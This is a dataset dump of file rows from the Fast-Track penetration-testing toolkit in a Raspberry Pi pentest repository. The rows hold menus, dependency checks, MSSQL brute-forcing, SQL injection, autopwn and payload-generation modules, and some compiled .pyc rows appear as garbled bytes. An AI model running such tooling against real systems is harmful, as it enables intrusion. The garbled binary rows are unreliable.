id int64 0 458k | file_name stringlengths 4 119 | file_path stringlengths 14 227 | content stringlengths 24 9.96M | size int64 24 9.96M | language stringclasses 1
value | extension stringclasses 14
values | total_lines int64 1 219k | avg_line_length float64 2.52 4.63M | max_line_length int64 5 9.91M | alphanum_fraction float64 0 1 | repo_name stringlengths 7 101 | repo_stars int64 100 139k | repo_forks int64 0 26.4k | repo_open_issues int64 0 2.27k | repo_license stringclasses 12
values | repo_extraction_date stringclasses 433
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
19,300 | .pydevproject.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/.svn/text-base/.pydevproject.svn-base | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
<?eclipse-pydev version="1.0"?>
<pydev_project>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">Default</pydev_property>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">python 2.5</pydev_property>
<pydev_pathproperty name="org.pyt... | 443 | Python | .py | 10 | 43.2 | 91 | 0.773148 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,301 | depend.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/depend.py | #!/usr/bin/env python
import os
count=0
# Perform Dependency check
print "\n\n\n\n\n***********************************************\n******* Performing dependency checks... *******\n***********************************************\n"
try:
import _mssql
print "*** FreeTDS and PYMMSQL are installed. (Check) ***... | 6,335 | Python | .py | 121 | 45.504132 | 304 | 0.67215 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,302 | nsecommon.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/nsecommon.py | #!/usr/bin/env python
'''Created on Sep 18, 2010
@author: Joey Furr (j0fer)'''
import os
from bin.include import print_banner
from time import sleep
# For NSE integration
def runnse(command):
print_banner()
os.system(command)
raw_input("\nPress <enter> to return...\n")
def get_target(counter,self_banner... | 1,209 | Python | .py | 36 | 26.777778 | 72 | 0.615785 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,303 | include.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/include.py | #!/usr/bin/env python
import os
def get_version():
readversion=file("bin/version/version","r")
for line in readversion:
version=line.rstrip()
return version
def print_banner():
# os.system("clear")
print ''' *****************************************************************
** ... | 845 | Python | .py | 18 | 43.888889 | 79 | 0.309002 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,304 | nmapsmbcheckvulns.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/nmapsmbcheckvulns.py | #!/usr/bin/env python
from bin.include import print_banner
from bin.nsecommon import get_target,runnse
def nmapsmbcheckvulns_run():
""" Main execution logic: reuse common
nse modules for this nse script """
self_banner = """ ** Nmap Scripting Engine: Script - smb-check-vulns **
** ... | 1,640 | Python | .py | 33 | 44.090909 | 97 | 0.556898 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,305 | exploitmenu.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/exploitmenu.py | #!/usr/bin/env python
import os,sys,time,subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
sys.path.append("%s/bin/exploits/" % (definepath))
while 1==1:
try:
include.p... | 2,914 | Python | .py | 88 | 25.659091 | 84 | 0.630999 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,306 | tutorialsmenu.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/tutorialsmenu.py | #!/usr/bin/env python
import sys,os
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
# method to display the tutorial text
def show_tutorial(tutorial_file):
include.print_banner()
print '\n'
display = open(tutorial_file, 'r')
try:
for line in display:
sy... | 2,275 | Python | .py | 65 | 29.553846 | 68 | 0.664528 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,307 | sqlinjector.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/sqlinjector.py | #!/usr/bin/env python
import os,sys,time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
while 1==1:
include.print_banner()
menu=raw_input("""
Enter which SQL Injector you want to use:
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter A... | 1,116 | Python | .py | 44 | 19.704545 | 60 | 0.638577 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,308 | main.pyc | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/main.pyc | Ñò
šƒkOc j @ s¤ d d k Z d d k Z d d k Z d d k Z d d k Z y d d k Z e i ƒ Wn e j
o n Xe i ƒ Z e i
i d e ƒ d d k Z e i
i d e ƒ d d k
Z
d Z e d d ƒ Z x e D] Z e i ƒ Z qÔ Wy†xd d j oqe i ƒ e d ƒ Z e d j o[y/... | 4,295 | Python | .py | 66 | 62.939394 | 289 | 0.463888 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,309 | updatemenu.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/updatemenu.py | #!/usr/bin/env python
import os,time,sys,subprocess
# import custom methods
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1 == 1 :
include.print_banner()
menuz=raw_input('''
Fast-Track Update Menu:
... | 1,947 | Python | .py | 56 | 29.607143 | 131 | 0.678781 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,310 | sqlpwnagemenu.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/sqlpwnagemenu.py | #!/usr/bin/env python
import os,sys,time
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/sqlpwnage/" % (definepath))
try:
try:
reload(sqlpwnage)
except Exception: pass
import sqlpwnage
except Exception,e:
prin... | 330 | Python | .py | 16 | 16.125 | 57 | 0.681818 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,311 | nsemenu.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/nsemenu.py | #!/usr/bin/env python
import os,sys,time,subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
sys.path.append("%s/bin/scanners/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1==1:
try:
include.print_banner()
ex... | 1,091 | Python | .py | 36 | 24.833333 | 84 | 0.637948 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,312 | externalhacking.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/externalhacking.py | #!/usr/bin/env python
import os,time,re
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",line)
... | 34,858 | Python | .py | 416 | 67.713942 | 4,046 | 0.590632 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,313 | internalhacking.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/internalhacking.py | #!/usr/bin/env python
import os,time
try:
import psyco
psyco.full()
except ImportError:
pass
while 1==1:
intmenu=raw_input("""\nInternal Pentesting Menu:
1. Microsoft SQL Bruter
2. Port Scanning
3. Go Back a previous menu
Enter a number: """)
# Option 1 SQL Hackin
if intmen... | 8,634 | Python | .py | 184 | 29.842391 | 133 | 0.483639 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,314 | updateftonlymenu.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/updateftonlymenu.py | #!/usr/bin/env python
import os,sys
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1 == 1 :
include.print_banner()
menuz=raw_input('''
Fast-Track Update Menu (BackTrack):
1. Update Fast-Track
... | 527 | Python | .py | 25 | 16.6 | 47 | 0.644172 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,315 | mssqlattacks.pyc | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/mssqlattacks.pyc | —Ú
öÉkOc @ sA d d k Z d d k Z d d k Z e i É Z e i i d e É d d k Z y d d k Z e i É Wn e
j
o n Xe i É Z xÆd d j o†e i É e d É Z
e
d j o Pn e
d j oi e i i d e É y4 y e e É Wn e j
o n Xd d k Z Wq:e j
... | 1,250 | Python | .py | 19 | 63.578947 | 307 | 0.428804 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,316 | servicesmenu.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/servicesmenu.py | #!/usr/bin/env python
import os,time,re
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",line)
if match:
line=line.replace("METASPLOIT_PATH=","")
... | 1,851 | Python | .py | 52 | 27.192308 | 90 | 0.580915 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,317 | mssqlattacks.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/mssqlattacks.py | #!/usr/bin/env python
import os,sys,time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
while 1==1:
include.print_banner()
menu=raw_input("""
Microsoft SQL Attack Tools
1. MSSQL Injec... | 1,202 | Python | .py | 54 | 16.962963 | 62 | 0.618421 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,318 | main.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/main.py | #!/usr/bin/env python
import time,re,os,sys,subprocess
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
sys.path.append("%s/bin/setup/" % (definepath))
import depend
updateconfig=""
# Main Menu to choose
readversion... | 6,486 | Python | .py | 194 | 22.613402 | 269 | 0.543429 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,319 | sqlbrute.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/sqlbrute.py | #!/usr/bin/env python
import os,sys,time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1==1:
try:
import _mssql
include.print_banner()
sqlpo... | 9,131 | Python | .py | 188 | 29.510638 | 133 | 0.462752 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,320 | tutorialsmenu.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/tutorialsmenu.py.svn-base | #!/usr/bin/env python
import sys,os
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
# method to display the tutorial text
def show_tutorial(tutorial_file):
include.print_banner()
print '\n'
display = open(tutorial_file, 'r')
try:
for line in display:
sy... | 2,275 | Python | .py | 65 | 29.553846 | 68 | 0.664528 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,321 | sqlbrute.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/sqlbrute.py.svn-base | #!/usr/bin/env python
import os,sys,time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1==1:
try:
import _mssql
include.print_banner()
sqlpo... | 9,131 | Python | .py | 188 | 29.510638 | 133 | 0.462752 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,322 | exploitmenu.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/exploitmenu.py.svn-base | #!/usr/bin/env python
import os,sys,time,subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
sys.path.append("%s/bin/exploits/" % (definepath))
while 1==1:
try:
include.p... | 2,914 | Python | .py | 88 | 25.659091 | 84 | 0.630999 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,323 | internalhacking.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/internalhacking.py.svn-base | #!/usr/bin/env python
import os,time
try:
import psyco
psyco.full()
except ImportError:
pass
while 1==1:
intmenu=raw_input("""\nInternal Pentesting Menu:
1. Microsoft SQL Bruter
2. Port Scanning
3. Go Back a previous menu
Enter a number: """)
# Option 1 SQL Hackin
if intmen... | 8,634 | Python | .py | 184 | 29.842391 | 133 | 0.483639 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,324 | sqlpwnagemenu.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/sqlpwnagemenu.py.svn-base | #!/usr/bin/env python
import os,sys,time
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/sqlpwnage/" % (definepath))
try:
try:
reload(sqlpwnage)
except Exception: pass
import sqlpwnage
except Exception,e:
prin... | 330 | Python | .py | 16 | 16.125 | 57 | 0.681818 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,325 | updatemenu.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/updatemenu.py.svn-base | #!/usr/bin/env python
import os,time,sys,subprocess
# import custom methods
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1 == 1 :
include.print_banner()
menuz=raw_input('''
Fast-Track Update Menu:
... | 1,947 | Python | .py | 56 | 29.607143 | 131 | 0.678781 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,326 | nsemenu.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/nsemenu.py.svn-base | #!/usr/bin/env python
import os,sys,time,subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
sys.path.append("%s/bin/scanners/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1==1:
try:
include.print_banner()
ex... | 1,091 | Python | .py | 36 | 24.833333 | 84 | 0.637948 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,327 | externalhacking.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/externalhacking.py.svn-base | #!/usr/bin/env python
import os,time,re
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",line)
... | 34,858 | Python | .py | 416 | 67.713942 | 4,046 | 0.590632 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,328 | sqlinjector.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/sqlinjector.py.svn-base | #!/usr/bin/env python
import os,sys,time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
while 1==1:
include.print_banner()
menu=raw_input("""
Enter which SQL Injector you want to use:
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter A... | 1,116 | Python | .py | 44 | 19.704545 | 60 | 0.638577 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,329 | main.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/main.py.svn-base | #!/usr/bin/env python
import time,re,os,sys,subprocess
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
sys.path.append("%s/bin/setup/" % (definepath))
import depend
updateconfig=""
# Main Menu to choose
readversion... | 6,486 | Python | .py | 194 | 22.613402 | 269 | 0.543429 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,330 | updateftonlymenu.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/updateftonlymenu.py.svn-base | #!/usr/bin/env python
import os,sys
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
while 1 == 1 :
include.print_banner()
menuz=raw_input('''
Fast-Track Update Menu (BackTrack):
1. Update Fast-Track
... | 527 | Python | .py | 25 | 16.6 | 47 | 0.644172 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,331 | servicesmenu.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/servicesmenu.py.svn-base | #!/usr/bin/env python
import os,time,re
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",line)
if match:
line=line.replace("METASPLOIT_PATH=","")
... | 1,851 | Python | .py | 52 | 27.192308 | 90 | 0.580915 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,332 | mssqlattacks.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/menu/.svn/text-base/mssqlattacks.py.svn-base | #!/usr/bin/env python
import os,sys,time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
while 1==1:
include.print_banner()
menu=raw_input("""
Microsoft SQL Attack Tools
1. MSSQL Injec... | 1,202 | Python | .py | 54 | 16.962963 | 62 | 0.618421 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,333 | depend.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/setup/depend.py | #!/usr/bin/env python
import os
count=0
# Perform Dependency check
print "\n\n\n\n\n***********************************************\n******* Performing dependency checks... *******\n***********************************************\n"
try:
import _mssql
print "*** FreeTDS and PYMMSQL are installed. (Check) ***"
... | 6,193 | Python | .py | 121 | 46.347107 | 302 | 0.68553 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,334 | depend.pyc | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/setup/depend.pyc | Ñò
™ƒkOc @ s+ d d k Z d Z d GHy d d k Z d GHe d Z Wnã e j
oÀ d GHe d ƒ Z e d j p
e d j oŽ d
GHe i d ƒ Z e i d ƒ Z e i d
ƒ Z d GHe i d ƒ Z
d GHd GHy d d k Z d GHe d Z Wq e j
o d GHq Xqn e j
o d GHn Xy d ... | 4,359 | Python | .py | 35 | 123.4 | 1,353 | 0.583333 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,335 | depend.py.svn-base | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/setup/.svn/text-base/depend.py.svn-base | #!/usr/bin/env python
import os
count=0
# Perform Dependency check
print "\n\n\n\n\n***********************************************\n******* Performing dependency checks... *******\n***********************************************\n"
try:
import _mssql
print "*** FreeTDS and PYMMSQL are installed. (Check) ***"
... | 6,193 | Python | .py | 121 | 46.347107 | 302 | 0.68553 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,336 | sqlping.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlping.py | #!/usr/bin/env python
import time
import subprocess
import os
import re
import sys
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",line)
if match:
... | 4,190 | Python | .py | 95 | 39.136842 | 202 | 0.682007 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,337 | updatemeta.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/updatemeta.py | #!/usr/bin/env python
import os
import re
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
# define metasploit path
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
line=line.rstrip()
match=re.search("METASPLOIT_PATH",li... | 495 | Python | .py | 19 | 23 | 75 | 0.711864 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,338 | sqlftppayload.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlftppayload.py | #!/usr/bin/env python
import pexpect
import os
import time
import sys
import subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
try:
targeturl=sys.argv[4]
except IndexError:
include.print_banner()
... | 4,058 | Python | .py | 78 | 48.24359 | 854 | 0.706757 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,339 | sqlmanual.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlmanual.py | #!/usr/bin/env python
import socket
import pexpect
import os
import time
import sys
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
try:
targeturl=sys.argv[4]
port=sys.argv[6]
ipaddr=sys.argv[5]
except Ind... | 15,236 | Python | .py | 143 | 103.895105 | 1,531 | 0.684416 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,340 | sqlbinarypayloadpost.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlbinarypayloadpost.py | #!/usr/bin/env python
from urllib2 import urlopen
from ClientForm import ParseResponse
import os
import sys
import re
import socket
import time
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
include.print_banner()
try:
import psyco
psyco.full()
except ImportError:
pass
... | 11,739 | Python | .py | 99 | 114.20202 | 8,130 | 0.6865 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,341 | sqlbrutequick.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlbrutequick.py | #!/usr/bin/env python
import _mssql
import sys
import os
import time
import re
import subprocess
import pexpect
import socket
definepath=os.getcwd()
try:
import psyco
psyco.full()
except ImportError:
pass
try:
username=sys.argv[5]
except IndexError:
username=raw_input("Enter username for SQL database... | 21,517 | Python | .py | 389 | 44.115681 | 668 | 0.612174 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,342 | include.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/include.py | #!/usr/bin/env python
import os
import re
import time
# Compile a regex for faster searching
re_distrofile = re.compile ('BackTrack.+')
def get_version():
readversion=file("bin/version/version","r")
for line in readversion:
version=line.rstrip()
return version
#
# Class for colors
#
class bcolor... | 2,162 | Python | .py | 53 | 36.962264 | 145 | 0.387804 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,343 | autopwn.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/autopwn.py | #!/usr/bin/env python
import pexpect
import sys
import os
import time
import re
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
try:
import psyco
psyco.full()
except ImportError:
pass
try:
ipaddr=sys.argv[3]
except IndexError:
include.print_banner()
ipaddr=raw_... | 2,963 | Python | .py | 85 | 31.070588 | 133 | 0.700454 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,344 | binarypayloadgen.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/binarypayloadgen.py | #!/usr/bin/env python
import os
import sys
import time
import subprocess
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
include.print_banner()
try:
import psyco
psyco.full()
except ImportError:
pass
try:
define=sys.argv[3]
except IndexError:
print """Binary to Hex... | 2,085 | Python | .py | 56 | 33.946429 | 91 | 0.685672 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,345 | include.pyc | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/include.pyc | Ñò
šƒkOc @ s\ d d k Z d d k Z d d k Z e i d ƒ Z d „ Z d d d „ ƒ YZ d „ Z d S( iÿÿÿÿNs BackTrack.+c C s0 t d d ƒ } x | D] } | i ƒ } q W| S( Ns bin/version/versiont r( t filet rstrip( t readversiont linet versi... | 2,068 | Python | .py | 16 | 127.25 | 439 | 0.357526 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,346 | updates.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/updates.py | #!/usr/bin/env python
import time
import os
import sys
import subprocess
import re
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
print "\nNote this DOES NOT install prereqs, please go to the installation menu for that.\nUpdating Fast-Track, Metasploit, Aircrack-NG, Nikto, W3A... | 3,771 | Python | .py | 71 | 48.873239 | 210 | 0.72582 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,347 | sqlbruteword.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/sqlbruteword.py | #!/usr/bin/env python
import _mssql
import sys
import os
import time
import re
import subprocess
import pexpect
import socket
definepath=os.getcwd()
try:
import psyco
psyco.full()
except ImportError:
pass
try:
# scanfirst1=sys.argv[4]
username=sys.argv[5]
except IndexError:
# scanfirst1=raw_input("... | 25,904 | Python | .py | 469 | 43.292111 | 305 | 0.607555 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |
19,348 | payloadgen.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/ftsrc/payloadgen.py | #!/usr/bin/env python
# Import modules
import subprocess,time,sys,os,re
